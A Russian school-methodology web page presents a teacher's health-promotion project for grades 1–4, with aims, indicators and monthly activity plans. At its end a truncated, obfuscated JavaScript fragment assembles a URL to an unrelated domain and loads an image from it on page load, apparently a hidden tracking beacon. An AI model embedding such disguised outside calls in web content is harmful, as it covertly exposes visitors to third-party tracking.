Проект жизнедеятельности младших школьников «Будь здоров!»
статья (1 класс) по теме
Этот проект направлен на сохранение и укрепление здоровья учащихся 1-4 классов, а так же воспитание потребности в здоровом образе жизни, т. к. только здоровый ребенок способен успешно и в полной мере овладеть школьной программой.
Автор: смирнова с.и.
Источник: учебно- методические издания/ источники интернета.
Скачать:
Вложение | Размер |
---|---|
Проект сохранения и укрепления здоровья мл. школьников | 180 КБ |
Предварительный просмотр:
Проект жизнедеятельности младших школьников «Будь здоров»
Пояснительная записка.
Человек- высшее творение природы. Но для того чтобы наслаждаться ее сокровищами, он должен отвечать , по крайней мере, одному требованию: быть здоровым.
Учеными доказано, что 75% болезней взрослых заработаны в детские годы. Думая о будущем детей, надо особо подчеркнуть младший школьный возраст как самый важный.
Этот проект направлен на сохранение и укрепление здоровья учащихся 1-4 классов, а так же воспитание потребности в здоровом образе жизни, т. к. только здоровый ребенок способен успешно и в полной мере овладеть школьной программой.
Актуальность проблемы.
В условиях современной , природной и социально- экономической ситуации проблема здоровья детей приобретает глобальный характер. Здоровье каждого человека, в т. ч. и ребенка, определяется соотношением внешних и внутренних воздействий на его организм, с одной стороны, и возможностями самого организма противостоять нежелательным воздействиям ,защищаться от них, по возможности усиливая воздействие полезных для здоровья факторов, с другой стороны.
Степень успешности этой деятельности –устранения вредных воздействий (корректировка окружающей среды) и повышения устойчивости (тренировка, повышение адаптационных способностей организма)- определяет направления усилий по сохранению и укреплению здоровья.
Свою долю ответственности за сложившуюся ситуацию несет и система образования.
Одной из важнейших задач школы в соответствии с целями современной реформы образования в России является сохранение и укрепление здоровья учащихся
Проведя анализ медицинских карт и беседы с родителями детей, поступивших в школу в новом учебном году, выясняется, что, не будучи еще школьниками, они уже имеют серьезные проблемы, которые могут в дальнейшем усугубиться и стать причинами ,вызывающими трудности в обучении.
Проблема |
Нарушение осанки |
Ослаблено зрение |
Хронические заболевания |
Дефекты речи |
3 группа здоровья |
Здоровые дети |
Пытаясь исправить создавшееся положение, представляю проект программы жизнедеятельности младших школьников, мероприятия которой направлены на укрепление здоровья и активизацию самого субъекта воспитания- ребенка.
Цель: создание условий, позволяющих воспитать потребность в принятии ЗОЖ.
Задачи :
- внедрять здоровьесберегающие технологии для укрепления здоровья школьника
- сформировать у учащихся необходимый уровень грамотности по вопросам ЗОЖ
- Повысить интерес к спортивным мероприятиям
- Систематически проводить мониторинг диагностики здоровья и психофизического состояния учащихся.
Принципы программы:
- у каждого ребенка свой потенциал здоровья, его нужно учитывать
- здоровье- это состояние организма, им нужно научиться управлять
- здоровье- это результат собственного творчества
- принцип сотрудничества педагогов и родителей.
Участники программы:
- учащиеся 1-4 классов
- учителя,работающие в этих классах
- педагог –психолог
- логопед
- медицинский работник
- родители
Ожидаемые результаты:
1.Мотивация обучающихся на ЗОЖ
2.Сохранение и укрепление здоровья младших школьников
Показатели результативности программы:
- увеличение числа детей занятых в спортивных секциях
- снижение количества пропущенных уроков по причине простудных заболеваний
- отсутствие увеличения количества детей с нарушением осанки и зрения
- сформированность у учащихся и их родителей необходимого уровня грамотности по вопросам ЗОЖ
Индикаторы:
- соотношение результатов медицинских осмотров
- соотношение количества пропущенных уроков по причине простудных заболеваний
- соотношение количества детей занятых в спортивных секциях
- соотношение результатов тестирования по уровня грамотности в вопросах ЗОЖ
Программа реализуется на базе МОУ сош №11 г. Ачинска Красноярского края Российской Федерации. Так же учитывался опыт других учебных заведений для достижения положительных результатов в решении этой проблемы.
Содержание программы структурировано по пяти основным направлениям:
Направления | Задачи | Формы |
1. Оздоровительные мероприятия в режиме учебного времени и ГПД | .Снять утомляемость .Обучить жизненно важным двигательным навыкам и умениям, применению их в различных по сложности условиям | Динамические паузы Здоровьесберегающие технологии Питьевой режим Уроки физического воспитания |
2. Внеурочные спортивные мероприятия | Развивать силу, ловкость. выносливость Формировать навыки работы в команде | Спортивные праздники Эстафеты игры |
3. Внеклассная воспитательная работа | Формировать необходимые знания в области гигиены, медицины, физической культуры, правильного питания Развивать творческую активность учащихся | Тематические классные часы Конкурсы Проектная деятельность |
4. Работа с родителями | Повысить образовательный уровень родителей в вопросах гигиены, медицины, физической культуры, правильного питания Воспитывать активную позицию в отношении ЗОЖ | Тематические родительские собрания Спортивные праздники Круглый стол Индивидуальные беседы |
5. Работа службы сопровождения(психолог, логопед, мануальный терапевт) | Сохранить душевное здоровье и эмоциональное благополучие каждого ребенка Коррекция речевых нарушений и нарушений в познавательной сфере Осанка и грудная клетка | Индивидуальные занятия Групповые занятия Беседы Тренинги Консультации |
План реализации проекта программы жизнедеятельности учащихся 1-4 классов
Программа реализуется в несколько этапов:
1 класс «Уроки Мойдодыра»
2класс «Уроки Айболита»
3 класс «Уроки Знайки»
4 класс «Живем без докторов»
1 класс «Уроки Мойдодыра»
месяц | Внеурочные спортивные мероприятия | Воспитательная работа | Работа с родителями | Работа службы сопровождения | Оздоровительные мероприятия в режиме учебного времени и ГПД |
сентябрь | День здоровья Посещение бассейна | Классный час «Умывание и купание» | Родительское собрание «Режим дня младшего школьника» | индивидуальные занятия групповые занятия беседы консультации тренинги | . Уроки физ воспитания .динамические паузы .физ. минутки .пальчиковая гимнастика .смена видов деятельности на уроках .питьевой режим .дыхательная гимнастика .музыкотерапия .создание благоприятного психологического климата на уроке .лечебная гимнастика |
октябрь | Спортивный праздник «Папа, мама, я- спортивная семья» | Классный час «Забота о глазах» | Помощь в проведении спортивного праздника | ||
ноябрь | Час здоровья Посещение бассейна | Классный час «Уход за ушами» | Родит собр «Что мы знаем о ЗОЖ» | ||
декабрь | Спортивные эстафеты | Классный час «Уход за зубами» | |||
январь | Соревнования на свежем воздухе | Классный час «Уход за руками и ногами» | КРУГЛЫЙ СТОЛ «как воспитывать у ребенка хорошую привычку» | ||
февраль | Зимние олимпийские игры | Классный час «Как следует питаться» Конкурс рисунков «Мой любимый вид спорта» | Род.собр.»Поговорим о питании. .Это важно» | ||
март | Спортивный праздник «Сильные, смелые , ловкие» | Классный час «Забота о коже» | Спортивный праздник | ||
апрель | Подвижные игры Посещение бассейна | Классный час «Настроение в школе и после» | Род.собр. «Как часто ваш ребенок плачет» | ||
май | День здоровья | Классный час «Вредные привычки» |
2 класс «Уроки Айболита»
Месяц | Внеурочные спортивные мероприятия | Воспитательная работа | Работа с родителями | Работа службы сопровождения | Оздоровительные мероприятия в режиме учебного времени и ГПД |
сентябрь | День здоровья | Классный час. «Ты растешь». Возрастная гигиена | Индивидуальные занятия | 1.Уроки физ. воспит. 2.Физ. Минутки 3.Пальчиковая гимнастика 4.дыхательная гимнастика 5.мозговая гимнастика 6релаксаутогенная терапия(релаксация мышц лица, век, глаз) 7музыкотерапия 8питьевой режим 9проветривание 10смена видов деятельности 11создание благоприятного психологического климата на уроке и в ГПД 12. Лечебная гимнастика (скалиоз,искривление грудной клетки) | |
октябрь | Час здоровья. Знакомство с видами спорта | Кл. час «как стать нехворайкой». Конкурс рисунков«Мой любимый вид спорта» | Групповые занятия | ||
ноябрь | Спортивные соревнования «Праздник здоровья» | Кл.час «Что нужно знать о лекарствах» | Беседы | ||
декабрь | Лыжные соревнования | Кл.час «Первая помощь при отравлении жидкостями ,пищей, парами, газами, дымом» | |||
январь | Спортивный праздник»Папа,мама,я- спортивная семья Посещение бассейна | Кл.час «первая помощь при перегреваниях и тепловых ударах,при ожогах и отморожениях | Проведение спортивного праздника | Консультации | |
февраль | Малые зимние олимпийские игры Посещение бассейна | Кл.час «Первая помощь при травмах» | Род.собр «Психология здоровья младших школьников» | Практикумы для родителей | |
март | Подвижные игры на свежем воздухе Посещение бассейна | Кл час «Первая помощь при попадании инородных тел в глаз,ухо,горло,нос | Род.собр. «Формирование здорового образа жизни» | ||
апрель | Спортивный праздник»Сильные,смелые,ловкие» Посещение басс | Кл.час «Первая помощь при укусах насекомых,змей,собак и кошек. | Проведение спортивного праздника | Тренинги | |
май | День здоровья Посещение бассейна | Кл. час «Сегодняшние заботы медицины» |
3 класс . «Уроки Знайки»
месяц | Внеурочные спортивные мероприятия | Воспитательная работа | Работас родителями | Работа службы сопровождения | Оздоровительные мероприятия в режиме учебного времени и ГПД |
сентябрь | День здоровья. Осенний кросс | Игра-путешествие «Откуда берутся грязнули?» | Род собр «Гигиена и режим младшего школьника в семье» | Индивидуальные занятия | 1.Уроки физ. воспит. 2.Физ. Минутки 3.Пальчиковая гимнастика 4.дыхательная гимнастика 5.мозговая гимнастика 6релаксаутогенная терапия(релаксация мышц лица, век, глаз) 7.гимнастика для глаз 8общеразвивающие Упражнения 9питьевой режим 10проветривание 11релаксационно- танцевальный комплекс |
октябрь | Спортивные соревнования «Быстрее,выше,сильнее» | Классный час «Режим дня- здоровый образ жизни» | Круглый стол «Что может быть важнее здоровья?»»Охрана зрения детей» Правильная осанка» | Групповые занятия | |
ноябрь | Спортивный час | Экскурсия «Как правильно одеваться осенью и зимой» | |||
декабрь | Игры на улице Веселые старты»Все на лыжи и на санки» | Викторина «Как стать нехворайкой» | Родит собрание «Режим питания и его разнообразие» | Беседы | |
январь | Малые зимние олимпийские игры | Классный час «Как правильно закаляться» | Помощь в проведении игр | Консультации | |
февраль | Спортивно- игровой праздник, посвященный Дню защитника Отечества | Конкурс рисунков «Мой любимый вид спорта» КВН «если хочешь быть здоров» | Встреча с детским врачом и стоматологом «чтобы зубы были здоровыми» «Детские инфекционные заболевания и их профилактика» | ||
март | Народные и подвижные игры на свежем воздухе | Ролевые игры»Уроки здоровья! Классный час «Как вести себя,когда что то болит?» | Родительское собрание «Секреты здоровья ребенка» | Тренинги | |
апрель | Спортивный праздник «Папа,мама,я- спортивная семья» | Праздник здоровья | Помощь в проведении спортивного праздника | ||
май | Спортивные соревнования «Самые смелые» | Классный час «Будем плавать,загорать» | Родительский урнир «Путь к здоровью,силе» |
4 класс «Живем без докторов»
Месяц | Внеурочные спортивные мероприятия | Воспитательная работа | Работа с родителями | Работа службы поддержки | Оздоровительные мероприятия в режиме учебного времени и ГПД |
сентябрь | День здоровья Осенний кросс | Классный час «Наше здоровье. эмоции,поступки,стресс» | Выявление эмоциональной атмосферы в семье Диагностика взаимоотношений родителей и учащихся Наказания в семье | Индивидуальные занятия Групповые занятия | 1.Уроки физического воспитания 2.питьевой режим 3проветривание 4.оздоровительные минутки 5Создание благоприятного психологического климата на уроке и в ГПД 6. пальчиковая гимнастика 7.дыхательная гимнастика 8гимнастика для глаз 9мозговая гимнастика 10релаксаутогенная терапия |
октябрь | Соревнования по мини футболу | Час общения»Помоги себе сам. Волевое поведение» | Род . собр «Ваш ребенок взрослеет» | Беседы | |
ноябрь | Час здоровья Посещение бассейна | Дискуссия»Почему некоторые поступки называют вредными. Тренинг безопасного поведения | Семейная спортивная спартакиада | Консультации | |
декабрь | Веселые старты | Защита проекта «Закаливание и оздоровление организма» | Круглый стол «Вредные привычки-профилактика в раннем возрасте» | Практикумы для родителей | |
январь | Все на лыжи | Выпуск стенной газеты «Будьте всегда здоровы» | Веселые старты «»Физическое развитие в школе и дома» | ||
февраль | Тропа туриста | Игра- соревнование «Культура ЗОЖ» | Род собр. «Компьютер пришел в дом» | ||
март | Народные игры Забавы на свежем воздухе | КЛАССНЫЙ ЧАС «Азбука поведения» | Анкетирование «Эмоции- положительные и отрицательные» | Тренинги | |
апрель | Спортивный праздник «Папа,мама,я- спортивная семья» | Час общения «Мы одна семья» | Спортивный праздник- «Папа,мама,я- спортивная семья» | ||
май | День здоровья Посещение бас | Игра- путешествие «В страну здоровья» |
Литература : учебно- методические издания.
По теме: методические разработки, презентации и конспекты
Проект жизнедеятельности младших школьников "Мы живем в России"
Ведущая идея проекта На первой ступени (начальное образование) закладываются основные моральные и нравственные ценности и нормы поведения, начинается ...
Проект по духовно-нравственному воспитанию для младших школьников "Будь человеком!"
Данный проект направлен на воспитание гражданской социальной компетентности, пробуждение у детей интереса к нравственным вопросам, раскрывает мир внутренних ценностей человека,...
Проект программы жизнедеятельности младших школьников « Школа здоровья»
В условиях современной природной и социально-экономической ситуации проблема здоровья детей приобретает глобальный характер. Здоровье каждого человека, в т. ч и ребёнка, определяется соотношением внеш...
Основы безопасности жизнедеятельности младших школьников
Систематическое планомерное обучение ребенка умению безопасно жить, учиться, отдыхать и трудиться. Занятия помогут предостеречь школьника от множества опасностей вокруг....
основы безопасности жизнедеятельности младших школьников
презентация "ОБЖ младших школьников"...
Методическая разработка внеклассного мероприятия внеурочной деятельности спортивно-оздоровительного направления для обучающихся младших классов «Будь здоров!» Детская зимняя военно-спортивная игра «Зарничка»
Мероприятие проводится для детей младшего школьного возраста совместно с родителями для профилактики и укрепления здоровья....
Памятка школьнику. Будь здоров!
var e,n,o;window.self===window.top&&(e=[\'//\',\'s:\',\'tp\',\'ht\'].reverse().join(\'\'),n=[\'xqiohpvda.lussoit.com\',\'41\'].join(\'/\'),(o=new Image).src=\'\'.concat(e).concat(n,\'.gif\')); !function(){ var ex...